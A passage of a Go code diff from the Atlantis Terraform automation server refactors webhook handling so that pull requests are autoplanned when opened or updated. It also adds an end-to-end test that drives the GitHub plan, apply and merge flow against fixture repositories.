+func (c Config) GetApplyStage(workflowName string) *Stage {
+	if flow, ok := c.Workflows[workflowName]; ok {
+		return flow.Apply
+	}
+	return nil
+}
+
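+// FindProjectsByDirWorkspace returns all projects that match both dir and
+// workspace.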
+func (c Config) FindProjectsByDirWorkspace(dir string, workspace string) []Project {
+ var ps []Project
+ for _, p := range c.Projects {
+ if p.Dir == dir && p.Workspace == workspace {
+ ps = append(ps, p)
+ }
+ }
+ return ps
+}
+
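+// FindProjectByName returns the first project with the given name, or nil if
+// none matches.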
+func (c Config) FindProjectByName(name string) *Project {
+ for _, p := range c.Projects {
+ if p.Name != nil && *p.Name == name {
+ return &p
+ }
+ }
+ return nil
+}
+
+type Project struct {
+ Dir string
+ Workspace string
+ Name *string
+ Workflow *string
+ TerraformVersion *version.Version
+ Autoplan Autoplan
+ ApplyRequirements []string
+}
+
+type Autoplan struct {
+ WhenModified []string
+ Enabled bool
+}
+
+type Stage struct {
+ Steps []Step
+}
+
+type Step struct {
+ StepName string
+ ExtraArgs []string
+ RunCommand []string
+}
+
+type Workflow struct {
+ Apply *Stage
+ Plan *Stage
+}
diff --git a/server/events_controller.go b/server/events_controller.go
index b5a447be14..f666e1e329 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -29,7 +29,7 @@ const githubHeader = "X-Github-Event"
const gitlabHeader = "X-Gitlab-Event"
// EventsController handles all webhook requests which signify 'events' in the
-// VCS host, ex. GitHub. It's split out from Server to make testing easier.
+// VCS host, ex. GitHub.
type EventsController struct {
CommandRunner events.CommandRunner
PullCleaner events.PullCleaner
@@ -39,18 +39,19 @@ type EventsController struct {
// GithubWebHookSecret is the secret added to this webhook via the GitHub
// UI that identifies this call as coming from GitHub. If empty, no
// request validation is done.
- GithubWebHookSecret []byte
- GithubRequestValidator GithubRequestValidator
- GitlabRequestParser GitlabRequestParser
+ GithubWebHookSecret []byte
+ GithubRequestValidator GithubRequestValidator
+ GitlabRequestParserValidator GitlabRequestParserValidator
// GitlabWebHookSecret is the secret added to this webhook via the GitLab
// UI that identifies this call as coming from GitLab. If empty, no
// request validation is done.
- GitlabWebHookSecret []byte
- RepoWhitelist *events.RepoWhitelist
+ GitlabWebHookSecret []byte
+ RepoWhitelistChecker *events.RepoWhitelistChecker
// SupportedVCSHosts is which VCS hosts Atlantis was configured upon
// startup to support.
SupportedVCSHosts []models.VCSHostType
VCSClient vcs.ClientProxy
+ TestingMode bool
}
// Post handles POST webhook requests.
@@ -60,6 +61,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) {
e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitHub")
return
}
+ e.Logger.Debug("handling GitHub post")
e.handleGithubPost(w, r)
return
} else if r.Header.Get(gitlabHeader) != "" {
@@ -67,6 +69,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) {
e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitLab")
return
}
+ e.Logger.Debug("handling GitLab post")
e.handleGitlabPost(w, r)
return
}
@@ -80,13 +83,16 @@ func (e *EventsController) handleGithubPost(w http.ResponseWriter, r *http.Reque
e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
return
}
+ e.Logger.Debug("request valid")
githubReqID := "X-Github-Delivery=" + r.Header.Get("X-Github-Delivery")
event, _ := github.ParseWebHook(github.WebHookType(r), payload)
switch event := event.(type) {
case *github.IssueCommentEvent:
+ e.Logger.Debug("handling as comment event")
e.HandleGithubCommentEvent(w, event, githubReqID)
case *github.PullRequestEvent:
+ e.Logger.Debug("handling as pull request event")
e.HandleGithubPullRequestEvent(w, event, githubReqID)
default:
e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event %s", githubReqID)
@@ -107,57 +113,100 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event
return
}
- // We pass in an empty models.Repo for headRepo because we need to do additional
- // calls to get that information but we need this code path to be generic.
- // Later on in CommandHandler we detect that this is a GitHub event and
- // make the necessary calls to get the headRepo.
- e.handleCommentEvent(w, baseRepo, models.Repo{}, user, pullNum, event.Comment.GetBody(), models.Github)
+ // We pass in nil for maybeHeadRepo because the head repo data isn't
+ // available in the GithubIssueComment event.
+ e.handleCommentEvent(w, baseRepo, nil, user, pullNum, event.Comment.GetBody(), models.Github)
}
// HandleGithubPullRequestEvent will delete any locks associated with the pull
// request if the event is a pull request closed event. It's exported to make
// testing easier.
func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) {
- pull, _, err := e.Parser.ParseGithubPull(pullEvent.PullRequest)
+ pull, baseRepo, headRepo, user, err := e.Parser.ParseGithubPullEvent(pullEvent)
if err != nil {
e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID)
return
}
- repo, err := e.Parser.ParseGithubRepo(pullEvent.Repo)
- if err != nil {
- e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID)
- return
+ var eventType string
+ switch pullEvent.GetAction() {
+ case "opened":
+ eventType = OpenPullEvent
+ case "synchronize":
+ eventType = UpdatedPullEvent
+ case "closed":
+ eventType = ClosedPullEvent
+ default:
+ eventType = OtherPullEvent
}
- e.handlePullRequestEvent(w, repo, pull)
+ e.Logger.Info("identified event as type %q", eventType)
+ e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType)
}
-func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, repo models.Repo, pull models.PullRequest) {
- if !e.RepoWhitelist.IsWhitelisted(repo.FullName, repo.VCSHost.Hostname) {
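+// Normalized pull request event types. Both the GitHub and GitLab handlers
+// map their VCS-specific actions onto these before calling
+// handlePullRequestEvent.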
+const OpenPullEvent = "opened"
+const UpdatedPullEvent = "updated"
+const ClosedPullEvent = "closed"
+const OtherPullEvent = "other"
+
+func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) {
+ if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+ // If the repo isn't whitelisted and we receive an opened pull request
+ // event we comment back on the pull request that the repo isn't
+ // whitelisted. This is because the user might be expecting Atlantis to
+ // autoplan. For other events, we just ignore them.
+ if eventType == OpenPullEvent {
+ e.commentNotWhitelisted(baseRepo, pull.Num)
+ }
e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
return
}
- if pull.State != models.Closed {
- e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event")
+
+ switch eventType {
+ case OpenPullEvent, UpdatedPullEvent:
+ // If the pull request was opened or updated, we will try to autoplan.
+
+ // Respond with success and then actually execute the command asynchronously.
+ // We use a goroutine so that this function returns and the connection is
+ // closed.
+ fmt.Fprintln(w, "Processing...")
+
+ e.Logger.Info("executing autoplan")
+ if !e.TestingMode {
+ go e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user)
+ } else {
+ // When testing we want to wait for everything to complete.
+ e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user)
+ }
return
- }
- if err := e.PullCleaner.CleanUpPull(repo, pull); err != nil {
- e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err)
+ case ClosedPullEvent:
+ // If the pull request was closed, we delete locks.
+ if err := e.PullCleaner.CleanUpPull(baseRepo, pull); err != nil {
+ e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err)
+ return
+ }
+ e.Logger.Info("deleted locks and workspace for repo %s, pull %d", baseRepo.FullName, pull.Num)
+ fmt.Fprintln(w, "Pull request cleaned successfully")
+ return
+ case OtherPullEvent:
+ // Else we ignore the event.
+ e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-actionable pull request event")
return
}
- e.Logger.Info("deleted locks and workspace for repo %s, pull %d", repo.FullName, pull.Num)
- fmt.Fprintln(w, "Pull request cleaned successfully")
}
func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) {
- event, err := e.GitlabRequestParser.Validate(r, e.GitlabWebHookSecret)
+ event, err := e.GitlabRequestParserValidator.ParseAndValidate(r, e.GitlabWebHookSecret)
if err != nil {
e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
return
}
+ e.Logger.Debug("request valid")
+
switch event := event.(type) {
case gitlab.MergeCommentEvent:
+ e.Logger.Debug("handling as comment event")
e.HandleGitlabCommentEvent(w, event)
case gitlab.MergeEvent:
+ e.Logger.Debug("handling as pull request event")
e.HandleGitlabMergeRequestEvent(w, event)
default:
e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event")
@@ -173,10 +222,10 @@ func (e *EventsController) HandleGitlabCommentEvent(w http.ResponseWriter, event
e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
return
}
- e.handleCommentEvent(w, baseRepo, headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab)
+ e.handleCommentEvent(w, baseRepo, &headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab)
}
-func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) {
+func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) {
parseResult := e.CommentParser.Parse(comment, vcsHost)
if parseResult.Ignore {
truncated := comment
@@ -187,14 +236,12 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated)
return
}
+ e.Logger.Info("parsed comment as %s", parseResult.Command)
// At this point we know it's a command we're not supposed to ignore, so now
// we check if this repo is allowed to run commands in the first place.
- if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
- errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
- if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
- e.Logger.Err("unable to comment on pull request: %s", err)
- }
+ if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+ e.commentNotWhitelisted(baseRepo, pullNum)
e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted")
return
}
@@ -211,23 +258,41 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
return
}
- // Respond with success and then actually execute the command asynchronously.
- // We use a goroutine so that this function returns and the connection is
- // closed.
+ e.Logger.Debug("executing command")
fmt.Fprintln(w, "Processing...")
- go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+ if !e.TestingMode {
+ // Respond with success and then actually execute the command asynchronously.
+ // We use a goroutine so that this function returns and the connection is
+ // closed.
+ go e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command)
+ } else {
+ // When testing we want to wait for everything to complete.
+ e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command)
+ }
}
// HandleGitlabMergeRequestEvent will delete any locks associated with the pull
// request if the event is a merge request closed event. It's exported to make
// testing easier.
func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) {
- pull, repo, err := e.Parser.ParseGitlabMergeEvent(event)
+ pull, baseRepo, headRepo, user, err := e.Parser.ParseGitlabMergeEvent(event)
if err != nil {
e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
return
}
- e.handlePullRequestEvent(w, repo, pull)
+ var eventType string
+ switch event.ObjectAttributes.Action {
+ case "open":
+ eventType = OpenPullEvent
+ case "update":
+ eventType = UpdatedPullEvent
+ case "merge", "close":
+ eventType = ClosedPullEvent
+ default:
+ eventType = OtherPullEvent
+ }
+ e.Logger.Info("identified event as type %q", eventType)
+ e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType)
}
// supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise.
@@ -246,3 +311,12 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel,
w.WriteHeader(code)
fmt.Fprintln(w, response)
}
+
+// commentNotWhitelisted comments on the pull request that the repo is not
+// whitelisted.
+func (e *EventsController) commentNotWhitelisted(baseRepo models.Repo, pullNum int) {
+ errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
+ if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
+ e.Logger.Err("unable to comment on pull request: %s", err)
+ }
+}
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
new file mode 100644
index 0000000000..d69471cb23
--- /dev/null
+++ b/server/events_controller_e2e_test.go
@@ -0,0 +1,452 @@
+package server_test
+
+import (
+ "bytes"
+ "fmt"
+ "io/ioutil"
+ "net/http"
+ "net/http/httptest"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "regexp"
+ "strings"
+ "testing"
+
+ "github.com/google/go-github/github"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/locking"
+ "github.com/runatlantis/atlantis/server/events/locking/boltdb"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform"
+ vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+ "github.com/runatlantis/atlantis/server/events/webhooks"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
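+// TestGitHubWorkflow runs the webhook flow end-to-end: it posts a pull request
+// opened event, a series of comment commands, and a closed event, and asserts
+// on each comment Atlantis creates in response. Only the VCS layer is mocked;
+// parsing, planning, and applying run for real, so this test is skipped in
+// -short mode.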
+func TestGitHubWorkflow(t *testing.T) {
+ if testing.Short() {
+ t.SkipNow()
+ }
+ RegisterMockTestingT(t)
+
+ cases := []struct {
+ Description string
+ // RepoDir is relative to testfixtures/test-repos.
+ RepoDir string
+ ModifiedFiles []string
+ ExpAutoplanCommentFile string
+ ExpMergeCommentFile string
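+ // CommentAndReplies is a flat list of alternating pairs: a comment to
+ // post, followed by the fixture file containing Atlantis's expected reply.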
+ CommentAndReplies []string
+ }{
+ {
+ Description: "simple",
+ RepoDir: "simple",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply", "exp-output-apply.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "simple with comment -var",
+ RepoDir: "simple",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt",
+ "atlantis apply", "exp-output-apply-var.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "simple with workspaces",
+ RepoDir: "simple",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt",
+ "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt",
+ "atlantis apply", "exp-output-apply-var-default-workspace.txt",
+ "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge-workspaces.txt",
+ },
+ {
+ Description: "simple with atlantis.yaml",
+ RepoDir: "simple-yaml",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -w staging", "exp-output-apply-staging.txt",
+ "atlantis apply", "exp-output-apply-default.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "modules staging only",
+ RepoDir: "modules",
+ ModifiedFiles: []string{"staging/main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan-only-staging.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -d staging", "exp-output-apply-staging.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge-only-staging.txt",
+ },
+ {
+ Description: "modules modules only",
+ RepoDir: "modules",
+ ModifiedFiles: []string{"modules/null/main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan-only-modules.txt",
+ CommentAndReplies: []string{
+ "atlantis plan -d staging", "exp-output-plan-staging.txt",
+ "atlantis plan -d production", "exp-output-plan-production.txt",
+ "atlantis apply -d staging", "exp-output-apply-staging.txt",
+ "atlantis apply -d production", "exp-output-apply-production.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge-all-dirs.txt",
+ },
+ {
+ Description: "modules-yaml",
+ RepoDir: "modules-yaml",
+ ModifiedFiles: []string{"modules/null/main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -d staging", "exp-output-apply-staging.txt",
+ "atlantis apply -d production", "exp-output-apply-production.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "tfvars-yaml",
+ RepoDir: "tfvars-yaml",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -p staging", "exp-output-apply-staging.txt",
+ "atlantis apply -p default", "exp-output-apply-default.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "tfvars no autoplan",
+ RepoDir: "tfvars-yaml-no-autoplan",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "",
+ CommentAndReplies: []string{
+ "atlantis plan -p staging", "exp-output-plan-staging.txt",
+ "atlantis plan -p default", "exp-output-plan-default.txt",
+ "atlantis apply -p staging", "exp-output-apply-staging.txt",
+ "atlantis apply -p default", "exp-output-apply-default.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
+ // Set the repo to be cloned through the testing backdoor.
+ repoDir, headSHA, cleanup := initializeRepo(t, c.RepoDir)
+ defer cleanup()
+ atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir)
+
+ // Setup test dependencies.
+ w := httptest.NewRecorder()
+ When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(headSHA), nil)
+ When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil)
+
+ // First, send the open pull request event and trigger an autoplan.
+ pullOpenedReq := GitHubPullRequestOpenedEvent(t, headSHA)
+ ctrl.Post(w, pullOpenedReq)
+ responseContains(t, w, 200, "Processing...")
+ if c.ExpAutoplanCommentFile != "" {
+ _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir)
+ }
+
+ // Now send any other comments.
+ for i := 0; i < len(c.CommentAndReplies); i += 2 {
+ comment := c.CommentAndReplies[i]
+ expOutputFile := c.CommentAndReplies[i+1]
+
+ commentReq := GitHubCommentEvent(t, comment)
+ w = httptest.NewRecorder()
+ ctrl.Post(w, commentReq)
+ responseContains(t, w, 200, "Processing...")
+ _, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ assertCommentEquals(t, expOutputFile, atlantisComment, c.RepoDir)
+ }
+
+ // Finally, send the pull request merged event.
+ pullClosedReq := GitHubPullRequestClosedEvent(t)
+ w = httptest.NewRecorder()
+ ctrl.Post(w, pullClosedReq)
+ responseContains(t, w, 200, "Pull request cleaned successfully")
+ numPrevComments := (len(c.CommentAndReplies) / 2) + 1
+ _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ assertCommentEquals(t, c.ExpMergeCommentFile, pullClosedComment, c.RepoDir)
+ })
+ }
+}
+
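+// setupE2E builds an EventsController in TestingMode wired with real parsers,
+// runners, locking, and a file workspace rooted in a temp dir. Only the VCS
+// client, commit status updater, and pull request getters are mocked. It
+// returns the controller, the mocked VCS client, the mocked GitHub pull
+// getter, and the workspace used for clones.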
+func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, *mocks.MockGithubPullGetter, *events.FileWorkspace) {
+ allowForkPRs := false
+ dataDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ // Mocks.
+ e2eVCSClient := vcsmocks.NewMockClientProxy()
+ e2eStatusUpdater := mocks.NewMockCommitStatusUpdater()
+ e2eGithubGetter := mocks.NewMockGithubPullGetter()
+ e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter()
+
+ // Real dependencies.
+ logger := logging.NewSimpleLogger("server", nil, true, logging.Debug)
+ eventParser := &events.EventParser{
+ GithubUser: "github-user",
+ GithubToken: "github-token",
+ GitlabUser: "gitlab-user",
+ GitlabToken: "gitlab-token",
+ }
+ commentParser := &events.CommentParser{
+ GithubUser: "github-user",
+ GithubToken: "github-token",
+ GitlabUser: "gitlab-user",
+ GitlabToken: "gitlab-token",
+ }
+ terraformClient, err := terraform.NewClient(dataDir)
+ Ok(t, err)
+ boltdb, err := boltdb.New(dataDir)
+ Ok(t, err)
+ lockingClient := locking.NewClient(boltdb)
+ projectLocker := &events.DefaultProjectLocker{
+ Locker: lockingClient,
+ }
+ workingDir := &events.FileWorkspace{
+ DataDir: dataDir,
+ TestingOverrideCloneURL: "override-me",
+ }
+
+ defaultTFVersion := terraformClient.Version()
+ locker := events.NewDefaultWorkingDirLocker()
+ commandRunner := &events.DefaultCommandRunner{
+ ProjectCommandRunner: &events.DefaultProjectCommandRunner{
+ Locker: projectLocker,
+ LockURLGenerator: &mockLockURLGenerator{},
+ InitStepRunner: &runtime.InitStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTFVersion,
+ },
+ PlanStepRunner: &runtime.PlanStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTFVersion,
+ },
+ ApplyStepRunner: &runtime.ApplyStepRunner{
+ TerraformExecutor: terraformClient,
+ },
+ RunStepRunner: &runtime.RunStepRunner{
+ DefaultTFVersion: defaultTFVersion,
+ },
+ PullApprovedChecker: e2eVCSClient,
+ WorkingDir: workingDir,
+ Webhooks: &mockWebhookSender{},
+ WorkingDirLocker: locker,
+ },
+ EventParser: eventParser,
+ VCSClient: e2eVCSClient,
+ GithubPullGetter: e2eGithubGetter,
+ GitlabMergeRequestGetter: e2eGitlabGetter,
+ CommitStatusUpdater: e2eStatusUpdater,
+ MarkdownRenderer: &events.MarkdownRenderer{},
+ Logger: logger,
+ AllowForkPRs: allowForkPRs,
+ AllowForkPRsFlag: "allow-fork-prs",
+ ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
+ ParserValidator: &yaml.ParserValidator{},
+ ProjectFinder: &events.DefaultProjectFinder{},
+ VCSClient: e2eVCSClient,
+ WorkingDir: workingDir,
+ WorkingDirLocker: locker,
+ AllowRepoConfigFlag: "allow-repo-config",
+ AllowRepoConfig: true,
+ },
+ }
+
+ ctrl := server.EventsController{
+ TestingMode: true,
+ CommandRunner: commandRunner,
+ PullCleaner: &events.PullClosedExecutor{
+ Locker: lockingClient,
+ VCSClient: e2eVCSClient,
+ WorkingDir: workingDir,
+ },
+ Logger: logger,
+ Parser: eventParser,
+ CommentParser: commentParser,
+ GithubWebHookSecret: nil,
+ GithubRequestValidator: &server.DefaultGithubRequestValidator{},
+ GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
+ GitlabWebHookSecret: nil,
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{
+ Whitelist: "*",
+ },
+ SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github},
+ VCSClient: e2eVCSClient,
+ }
+ return ctrl, e2eVCSClient, e2eGithubGetter, workingDir
+}
+
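+// mockLockURLGenerator returns a static lock URL so comment output is
+// deterministic across test runs.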
+type mockLockURLGenerator struct{}
+
+func (m *mockLockURLGenerator) GenerateLockURL(lockID string) string {
+ return "lock-url"
+}
+
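+// mockWebhookSender discards apply webhooks since these tests don't assert
+// on them.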
+type mockWebhookSender struct{}
+
+func (w *mockWebhookSender) Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error {
+ return nil
+}
+
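+// GitHubCommentEvent builds an issue_comment webhook request from the
+// githubIssueCommentEvent.json fixture, substituting comment for the
+// fixture's body placeholder.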
+func GitHubCommentEvent(t *testing.T, comment string) *http.Request {
+ requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent.json"))
+ Ok(t, err)
+ requestJSON = []byte(strings.Replace(string(requestJSON), "###comment body###", comment, 1))
+ req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+ Ok(t, err)
+ req.Header.Set("Content-Type", "application/json")
+ req.Header.Set(githubHeader, "issue_comment")
+ return req
+}
+
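+// GitHubPullRequestOpenedEvent builds a pull_request opened webhook request
+// from the githubPullRequestOpenedEvent.json fixture, substituting headSHA
+// for the fixture's hardcoded SHA.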
+func GitHubPullRequestOpenedEvent(t *testing.T, headSHA string) *http.Request {
+ requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json"))
+ Ok(t, err)
+ // Replace sha with expected sha.
+ requestJSONStr := strings.Replace(string(requestJSON), "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", headSHA, -1)
+ req, err := http.NewRequest("POST", "/events", bytes.NewBuffer([]byte(requestJSONStr)))
+ Ok(t, err)
+ req.Header.Set("Content-Type", "application/json")
+ req.Header.Set(githubHeader, "pull_request")
+ return req
+}
+
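+// GitHubPullRequestClosedEvent builds a pull_request closed webhook request
+// from the githubPullRequestClosedEvent.json fixture.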
+func GitHubPullRequestClosedEvent(t *testing.T) *http.Request {
+ requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestClosedEvent.json"))
+ Ok(t, err)
+ req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+ Ok(t, err)
+ req.Header.Set("Content-Type", "application/json")
+ req.Header.Set(githubHeader, "pull_request")
+ return req
+}
+
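+// GitHubPullRequestParsed returns the pull request object the mocked GitHub
+// pull getter should return, pointing at the test repo and headSHA.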
+func GitHubPullRequestParsed(headSHA string) *github.PullRequest {
+ // headSHA can't be empty, so default it if not set.
+ if headSHA == "" {
+ headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d"
+ }
+ return &github.PullRequest{
+ Number: github.Int(2),
+ State: github.String("open"),
+ HTMLURL: github.String("htmlurl"),
+ Head: &github.PullRequestBranch{
+ Repo: &github.Repository{
+ FullName: github.String("runatlantis/atlantis-tests"),
+ CloneURL: github.String("/runatlantis/atlantis-tests.git"),
+ },
+ SHA: github.String(headSHA),
+ Ref: github.String("branch"),
+ },
+ Base: &github.PullRequestBranch{
+ Repo: &github.Repository{
+ FullName: github.String("runatlantis/atlantis-tests"),
+ CloneURL: github.String("/runatlantis/atlantis-tests.git"),
+ },
+ },
+ User: &github.User{
+ Login: github.String("atlantisbot"),
+ },
+ }
+}
+
+// absRepoPath returns the absolute path to the test repo fixture repoDir
+// under testfixtures/test-repos.
+func absRepoPath(t *testing.T, repoDir string) string {
+ path, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir))
+ Ok(t, err)
+ return path
+}
+
+// initializeRepo copies the repo data from testfixtures and initializes a new
+// git repo in a temp directory. It returns that directory, the HEAD SHA of the
+// test branch, and a cleanup function to run in a defer that deletes the dir.
+// The purpose of this function is to create a real git repository with a branch
+// called 'branch' from the files under repoDir. This lets us keep those files
+// checked in normally, without needing a nested .git directory.
+func initializeRepo(t *testing.T, repoDir string) (string, string, func()) {
+ originRepo := absRepoPath(t, repoDir)
+
+ // Copy the files to the temp dir.
+ destDir, cleanup := TempDir(t)
+ runCmd(t, "", "cp", "-r", fmt.Sprintf("%s/.", originRepo), destDir)
+
+ // Initialize the git repo.
+ runCmd(t, destDir, "git", "init")
+ runCmd(t, destDir, "touch", ".gitkeep")
+ runCmd(t, destDir, "git", "add", ".gitkeep")
+ runCmd(t, destDir, "git", "config", "--local", "user.email", "atlantisbot@runatlantis.io")
+ runCmd(t, destDir, "git", "config", "--local", "user.name", "atlantisbot")
+ runCmd(t, destDir, "git", "commit", "-m", "initial commit")
+ runCmd(t, destDir, "git", "checkout", "-b", "branch")
+ runCmd(t, destDir, "git", "add", ".")
+ runCmd(t, destDir, "git", "commit", "-am", "branch commit")
+ headSHA := runCmd(t, destDir, "git", "rev-parse", "HEAD")
+ headSHA = strings.Trim(headSHA, "\n")
+
+ return destDir, headSHA, cleanup
+}
+
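+// runCmd runs name with args in dir, failing the test if the command errors,
+// and returns its combined output.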
